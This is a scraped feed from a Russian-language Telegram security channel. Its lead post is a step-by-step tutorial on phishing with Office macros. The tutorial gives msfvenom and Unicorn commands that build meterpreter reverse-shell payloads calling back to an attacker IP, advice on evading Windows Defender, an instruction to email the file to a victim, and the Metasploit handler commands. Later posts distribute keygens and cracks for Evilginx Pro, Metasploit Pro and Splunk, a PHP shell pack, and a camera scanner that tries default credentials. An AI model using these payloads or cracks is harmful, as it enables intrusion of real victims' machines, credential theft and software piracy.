C.I.T. Security
8.97K subscribers
3.13K photos
285 videos
4.31K files
4.45K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.

🤵Информационные войны и разведка: @cit_psyop
🧑‍🎓Курсы: @cit_course
🕵️Боты: @citsearch3_bot
@citsearch2bot
Download Telegram
PHISHING ATTACKS WITH OFFICE MACROS

Executable files are usually blocked in e-mails, so that it is usually easier to smuggle EXE files in via USB. Instead of phishing e-mails, in recent years there has therefore been an increasing use of Office Markos, which hide themselves in files stored on USB sticks.

In general, Excel macros can be created with Metasploit and the tool msfvenom, just like EXE files before. To do this, you specify the payload (-p), the respective payload options and, above all, the VBA format. Here Metasploit offers several variants. These include vba-psh, which is used to create and start VBA code for the PowerShell.

ifconfig

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.4 LPORT=8080 -f vba-psh -o vba-psh-msfvenom.txt


Windows Defender
recognizes the Metasploit code even when it is embedded in an Excel file as a macro. At this point you can again use encoders and iterations to bypass the virus scanner. An alternative possibility is the Pythons-Script Unicorn from TrustedSec, which can be obtained and started directly from Github.

git clone https://github.com/trustedsec/unicorn.git

cd unicorn

./unicorn.py --help


When calling, you specify the payload and other payload-specific options (for example, the IP address and port number to which the code is to connect back). Finally, the tool optionally expects you to specify which type of code it should create: hta, macro, dde or crt

To create a reverse shell that communicates over HTTPS and therefore cannot be detected by the firewall system, select the payload windows/meterpreter/reverse_https and insert the IP address of Kali Linux or the system you are using and any port. Finally, tell the tool with the macro parameter that you want to create an office file with macro.

./unicorn.py windows/meterpreter/reverse_https 192.168.0.4 443 macro


The unicorn tool describes how to insert this code into an Excel document immediately after creating the marker. To do this, open Excel and click on the "macros" item in the "View" ribbon. To create a new macro, you can enter any name in the upper text field of the new pop-up. Afterwards create the macro by clicking on "Create".

Click on the button "Macros" to get to the overview

You can then copy the code created by Unicorn directly into the editor. Copy the Unicorn code into the VBA Editor.

This completes the Excel macro and you can save the VBA code and close the editor. You can also save & close the Excel document. With a Phishing E-mail you can attach the file and send it to a recipient.

Since a Reverse Connect Shell was selected when creating the VBA code, you also have to open the port on your Kali linux. Unicorn has already written the necessary steps in the file unicorn.rc, so you only have to call Metasploit with the prepared script

msfconsole -r unicorn.rc


If the victim opens the Excel document, he is asked whether macros should be activated in Excel. If the target agrees, a connection with Kali Linux is established in the background. Immediately afterwards, the user is presented with a false error message, claiming that the file was created with an older version of Excel. This is to prevent the user from examining the file more closely.

Once macros have been activated, the code will connect back to Kali Linux where the incoming connections can be seen. With the session command you can then list and interact with current connections again.

msf exploit(multi/handler) > sessions -l

msf exploit(multi/handler) > sessions -i 1

meterpreter> sysinfo
❤2
Scripts_MEga_pack.rar
63.2 MB
📄 𝗧𝗼𝗼𝗹𝘀 𝗣𝗮𝗰𝗸 📦

Over 100 Scripts about

👉 C & C++
👉 PHP Shells
👉 Perl
👉 Python
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
🎶 Нашёл новую тулзу, которая делает автоматический мастеринг треков — TrackGleam прямо в браузере выдаёт чистый и насыщенный звук, как после обработки в студии.

Что делает:

• Исправляет частотный баланс, уменьшает резкость и многое другое.
• Отдельно контролирует низкие, средние и высокие частоты.
• Добавляет громкость и плотность звука.
• С помощью режимов AI Fix Gentle и Strong удаляет артефакты музыки от ИИ.
• Результат можно скачать в формате WAV.
• Без регистрации и водяных знаков.
• Вся обработка происходит локально, файлы не уходят на сервер.

Ваша личная студия звукозаписи в браузере — тут.

@notboring_tech

_______
Источник | #notboring_tech
@F_S_C_P

▪️Генерируй картинки и видео в Mini App:
Flux + Veo 3 + Wan 2.2 + MidJourney v7 + другие
❤3
Eyesharvester — это инструмент для разведки IP-камер, видеорегистраторов и сетевых видеорегистраторов. Вы задаёте диапазон IP-адресов, он сканирует распространённые порты, определяет производителя и, при необходимости, пытается использовать стандартные учётные данные. Он также может отображать известные уязвимости CVE, связанные с определённым брендом, и давать базовые рекомендации по усилению безопасности. Инструмент предназначен в основном для идентификации и составления отчётов.

https://github.com/Exhunterx/eyesharvester

📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
В последнее время мы видим много постов о God's Eye, симуляторе шпионского спутника, работающем в браузере. Это отличный инструмент, разработанный Билавалом Сидху, но для его работы требуются определенные платные API. Эти API значительно расширяют возможности программы, но их может быть сложно получить, или вы просто не хотите за них платить. Это нормально. Поэтому мы хотим рассказать о форке...

https://github.com/Gh0st-mods/Gods-Eye-Ghost-Edition

📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
JPEG Audit — инструмент для цифровой криминалистики фотографий. Он буквально разбирает JPEG по косточкам и помогает понять, откуда взялся снимок и что с ним могли делать.

https://jpegaudit.com/

📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Продолжаю развивать легальную базу для российских OSINT-исследователей на t.me/project_OSINTbro:

OSINTbro — портативный браузер для интернет-расследований и разведки по открытым источникам (OSINT), созданный на базе Opera Portable. Проект представляет собой готовое рабочее окружение, которое функционирует без установки на компьютер прямо с USB-флешки. Браузер содержит 1000+ структурированных OSINT-ресурсов, инструментов и поисковых закладок. Запускается на любом ПК без конфигурации, сохраняя рабочие сессии и историю внутри внешнего накопителя.

OSINT_links — готовый файл тех же закладок на OSINT-ресурсы, которые можно импортировать в Яндекс.Браузер, Chrome, Firefox, Safari и другие популярные браузеры.
❤2
@voice_platform_bot — позволяет идентифицировать платформу Telegram по отправленному голосовому сообщению.

В ручном режиме для этого используем команду:
exiftool -a -G1 -u voice.ogg

И смотрим на поле Vendor:

iPhone — libopus 1.5.1
Android — libopus unknown-fixed
Telegram Desktop (macos) — Lavf60.16.101
macOS native — libopus 1.3.1-fixed
Telegram X — libopus unknown
Telegram Web K — tweb
Telegram Web A — telegram-web-a

Наводка от https://t.me/chekist42

📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
evilginx_license_tool.py
5.3 KB
Evilginx Pro 4.3.2 Keygen

NOTE:
- The keygen works for the server option, the "client" one requires a real breakdev account.
- The software leak has been shared with us, but it seems to come from the well known scam group/channel we all know, please always be cautious
- To make the server license, please generate it and move it here data/licenses/server.evilginx

Usage:
  ./evilginx_license_tool.py encode server [--expires N] [-o out]
./evilginx_license_tool.py encode client --token X [--expires N] [-o out]
./evilginx_license_tool.py decode <file>
./evilginx_license_tool.py check <file>


Enjoy!
🔥2❤1
msfpro_keygen.py
17 KB
Metasploit Pro Keygen

Setup:
- Install Metasploit Pro
- Use the keygen and follow the steps.

You can find our analysis right here: https://cyberarsenal.org/threads/metasploit-pro-keygen-analysis.16551/ (Yes, we used AI to format the post better since we're lazy asses)

- Enjoy!

NOTE: this crack does not require any patch, just replacement of certificates and license files.
❤4👍1
Splunk_Enterprise_10.4.4 DVT V0dkaSh0ts
1 GB
This is from us. Windows Installer but AnyOS Crack. You know where to get it! Don't bother me! Enjoy! All hail Pwn3rzs! Greetings from DVT as well.
👍4❤1